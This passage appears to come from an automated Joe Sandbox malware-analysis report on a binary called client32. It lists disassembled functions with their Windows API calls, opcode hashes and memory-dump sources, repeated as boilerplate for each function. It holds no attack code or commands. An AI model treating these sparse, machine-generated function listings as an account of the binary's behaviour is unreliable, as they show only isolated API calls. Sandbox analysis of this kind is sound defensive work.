                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                  • String ID:
                                                                                  • API String ID: 3558565530-0
                                                                                  • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                  • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                  • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                  • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                  Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                  • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                  • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Color$RectText
                                                                                  • String ID:
                                                                                  • API String ID: 4034337308-0
                                                                                  • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                  • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                  • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                  • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                  Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetEvent.KERNEL32 ref: 110675BB
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                  • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchEvent
                                                                                  • String ID:
                                                                                  • API String ID: 4257095537-0
                                                                                  • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                  • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                  • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                  • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                  Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                  • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                  • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomDeleteGlobal$LongWindow
                                                                                  • String ID:
                                                                                  • API String ID: 964255742-0
                                                                                  • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                  • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                  • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                  • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                  Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                                  • SetFocus.USER32(?), ref: 11007403
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                  • String ID: edit
                                                                                  • API String ID: 1305092643-2167791130
                                                                                  • Opcode ID: 00037790fe496bd16934fd3c2f840e2ff7796c21e72fe7923f6eb13592277569
                                                                                  • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                                  • Opcode Fuzzy Hash: 00037790fe496bd16934fd3c2f840e2ff7796c21e72fe7923f6eb13592277569
                                                                                  • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                                  Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                                  • _memmove.LIBCMT ref: 11009336
                                                                                    • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                  • String ID: string too long
                                                                                  • API String ID: 2168136238-2556327735
                                                                                  • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                  • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                                  • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                                  • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                                  Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Xinvalid_argument_memmovestd::_
                                                                                  • String ID: string too long
                                                                                  • API String ID: 256744135-2556327735
                                                                                  • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                  • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                                  • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                                  • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                                  Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _calloc.LIBCMT ref: 1103B162
                                                                                  • _free.LIBCMT ref: 1103B25B
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                                  • String ID: CLTCONN.CPP
                                                                                  • API String ID: 183652615-2872349640
                                                                                  • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                  • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                                  • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                                  • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                                  Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: L
                                                                                  • API String ID: 1338273076-2909332022
                                                                                  • Opcode ID: fdd4c84c0dfc47c488fbb0e8ce0575bb2a84a8c934a13f54452f88a1b8797c7d
                                                                                  • Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
                                                                                  • Opcode Fuzzy Hash: fdd4c84c0dfc47c488fbb0e8ce0575bb2a84a8c934a13f54452f88a1b8797c7d
                                                                                  • Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1
                                                                                  Function 110AD1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 110AD1E3
                                                                                    • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                    • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                                  • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                                  Strings
                                                                                  • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$FreeLoad_memset
                                                                                  • String ID: winscard.dll is NOT valid!!!
                                                                                  • API String ID: 212038770-1939809930
                                                                                  • Opcode ID: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                  • Instruction ID: 57730f506c13caa9e6db9d6f73070caca170ae8d01d94efb838e03e2302413b1
                                                                                  • Opcode Fuzzy Hash: 2490663d4c0d4ec01f8a7efd0df3ebe9692d3296733f7b5ae7fba3cdb2ac2a80
                                                                                  • Instruction Fuzzy Hash: 6521B3B6D40629ABDB10CF95DC44EEFFBB8EB45660F00861AFC15A3340D631A904CBE0
                                                                                  Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                    • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                    • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                    • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
